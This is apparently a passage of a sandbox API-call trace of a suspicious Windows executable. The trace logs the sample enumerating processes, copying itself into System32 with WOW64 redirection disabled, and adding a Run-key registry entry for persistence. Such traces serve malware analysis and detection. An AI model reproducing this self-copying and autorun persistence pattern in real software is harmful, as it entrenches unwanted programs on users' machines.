	[0030.788] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0030.788] lstrlenW (lpString="lsass.exe") returned 9
	[0030.788] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0030.789] lstrlenW (lpString="lsm.exe") returned 7
	[0030.789] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0030.789] lstrlenW (lpString="svchost.exe") returned 11
	[0030.789] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0030.790] lstrlenW (lpString="svchost.exe") returned 11
	[0030.790] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0030.790] lstrlenW (lpString="svchost.exe") returned 11
	[0030.790] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0030.791] lstrlenW (lpString="svchost.exe") returned 11
	[0030.791] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0030.791] lstrlenW (lpString="svchost.exe") returned 11
	[0030.791] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0030.792] lstrlenW (lpString="audiodg.exe") returned 11
	[0030.792] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0030.792] lstrlenW (lpString="svchost.exe") returned 11
	[0030.792] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0030.792] lstrlenW (lpString="svchost.exe") returned 11
	[0030.793] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0030.793] lstrlenW (lpString="dwm.exe") returned 7
	[0030.793] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0030.793] lstrlenW (lpString="explorer.exe") returned 12
	[0030.793] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0030.794] lstrlenW (lpString="spoolsv.exe") returned 11
	[0030.794] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0030.794] lstrlenW (lpString="taskhost.exe") returned 12
	[0030.794] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0030.795] lstrlenW (lpString="svchost.exe") returned 11
	[0030.795] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0030.795] lstrlenW (lpString="taskeng.exe") returned 11
	[0030.795] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0030.796] lstrlenW (lpString="taskhost.exe") returned 12
	[0030.796] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0030.796] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0030.796] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0030.797] lstrlenW (lpString="python tragedy.exe") returned 18
	[0030.797] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0030.797] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0030.797] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0030.797] lstrlenW (lpString="computers.exe") returned 13
	[0030.797] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0030.798] lstrlenW (lpString="separated.exe") returned 13
	[0030.798] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0030.798] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0030.798] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0030.799] lstrlenW (lpString="darkness.exe") returned 12
	[0030.799] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0030.799] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0030.799] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0030.800] lstrlenW (lpString="sophisticated.exe") returned 17
	[0030.800] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0030.800] lstrlenW (lpString="wishlist.exe") returned 12
	[0030.800] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0030.801] lstrlenW (lpString="top.exe") returned 7
	[0030.801] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0030.801] lstrlenW (lpString="implemented.exe") returned 15
	[0030.801] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0030.801] lstrlenW (lpString="comp.exe") returned 8
	[0030.802] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0030.802] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0030.802] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0030.802] lstrlenW (lpString="solved.exe") returned 10
	[0030.802] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0030.803] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0030.803] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0030.803] lstrlenW (lpString="trips.exe") returned 9
	[0030.803] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0030.804] lstrlenW (lpString="tumormanual.exe") returned 15
	[0030.804] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0030.804] lstrlenW (lpString="telecom.exe") returned 11
	[0030.804] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0030.805] lstrlenW (lpString="realistic.exe") returned 13
	[0030.805] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0030.805] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0030.805] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0030.806] lstrlenW (lpString="dllhost.exe") returned 11
	[0030.806] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0030.806] lstrlenW (lpString="dllhost.exe") returned 11
	[0030.806] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0030.806] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0030.806] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 0
	[0030.807] CloseHandle (hObject=0xe4) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfd98 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfde0 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df1680 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df16a0 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df16e8 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df0e98 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf308 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf340 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf938 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf960 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf388 | out: hHeap=0x7d60000) returned 1
	[0030.807] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf988 | out: hHeap=0x7d60000) returned 1
	[0030.807] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7df6758
	[0030.808] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7e06760
	[0030.808] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.808] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcf988
	[0030.808] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf988, Size=0x40) returned 0x7dcfde0
	[0030.808] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.808] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcf988
	[0030.808] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.808] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcf960
	[0030.809] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.809] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcf938
	[0030.809] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf938, Size=0x40) returned 0x7dcfd98
	[0030.809] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7e06760, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjfkyfli;.exe")) returned 0x33
	[0030.809] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7e16768
	[0030.809] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7e26770
	[0030.809] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.809] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcf938
	[0030.809] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf938, Size=0x40) returned 0x7dcff00
	[0030.810] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcff00, Size=0x80) returned 0x7df26d0
	[0030.810] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df26d0, Size=0x100) returned 0x7df26d0
	[0030.810] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0030.810] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df26d0 | out: hHeap=0x7d60000) returned 1
	[0030.810] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\gjfkyfli;.exe", lpDst=0x7e16768, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\gjfkyfli;.exe") returned 0x22
	[0030.810] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e26770 | out: hHeap=0x7d60000) returned 1
	[0030.810] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e16768 | out: hHeap=0x7d60000) returned 1
	[0030.810] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0x9260020
	[0030.810] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.810] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcf938
	[0030.810] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.810] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcfcd0
	[0030.810] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0030.810] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0030.810] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x0) returned 1
	[0030.810] lstrlenW (lpString="kernel32.dll") returned 12
	[0030.810] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf938 | out: hHeap=0x7d60000) returned 1
	[0030.810] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0030.810] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfcd0 | out: hHeap=0x7d60000) returned 1
	[0030.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjfkyfli;.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4
	[0030.811] CreateFileW (lpFileName="C:\\Windows\\System32\\gjfkyfli;.exe" (normalized: "c:\\windows\\system32\\gjfkyfli;.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8
	[0030.812] ReadFile (in: hFile=0xe4, lpBuffer=0x9260020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x9260020*, lpNumberOfBytesRead=0x18f958*=0x3e600, lpOverlapped=0x0) returned 1
	[0030.827] WriteFile (in: hFile=0xe8, lpBuffer=0x9260020*, nNumberOfBytesToWrite=0x3e600, lpNumberOfBytesWritten=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x9260020*, lpNumberOfBytesWritten=0x18f958*=0x3e600, lpOverlapped=0x0) returned 1
	[0030.832] ReadFile (in: hFile=0xe4, lpBuffer=0x9260020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x9260020*, lpNumberOfBytesRead=0x18f958*=0x0, lpOverlapped=0x0) returned 1
	[0030.832] CloseHandle (hObject=0xe8) returned 1
	[0030.837] CloseHandle (hObject=0xe4) returned 1
	[0030.837] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.837] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcfcd0
	[0030.837] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.837] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcf938
	[0030.837] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0030.837] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0030.837] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0030.837] lstrlenW (lpString="kernel32.dll") returned 12
	[0030.837] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf938 | out: hHeap=0x7d60000) returned 1
	[0030.837] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0030.837] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfcd0 | out: hHeap=0x7d60000) returned 1
	[0030.837] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x9260020 | out: hHeap=0x7d60000) returned 1
	[0030.842] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.842] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcfcd0
	[0030.842] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcfcd0, Size=0x40) returned 0x7dcff00
	[0030.842] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcff00, Size=0x80) returned 0x7df26d0
	[0030.842] lstrlenW (lpString="C:\\Windows\\System32\\gjfkyfli;.exe") returned 33
	[0030.842] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45
	[0030.842] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x5c) returned 0x7df29b8
	[0030.842] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18f92c | out: phkResult=0x18f92c*=0xe4) returned 0x0
	[0030.842] RegSetValueExW (in: hKey=0xe4, lpValueName="gjfkyfli;.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\System32\\gjfkyfli;.exe", cbData=0x42 | out: lpData="C:\\Windows\\System32\\gjfkyfli;.exe") returned 0x0
	[0030.843] RegCloseKey (hKey=0xe4) returned 0x0
	[0030.843] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df29b8 | out: hHeap=0x7d60000) returned 1
	[0030.843] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45
	[0030.843] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df26d0 | out: hHeap=0x7d60000) returned 1
	[0030.843] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7e16768
	[0030.844] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7e26770
	[0030.844] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.844] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e98, Size=0x20) returned 0x7dcfcd0
	[0030.844] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcfcd0, Size=0x40) returned 0x7dcff00
	[0030.844] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcff00, Size=0x80) returned 0x7df26d0
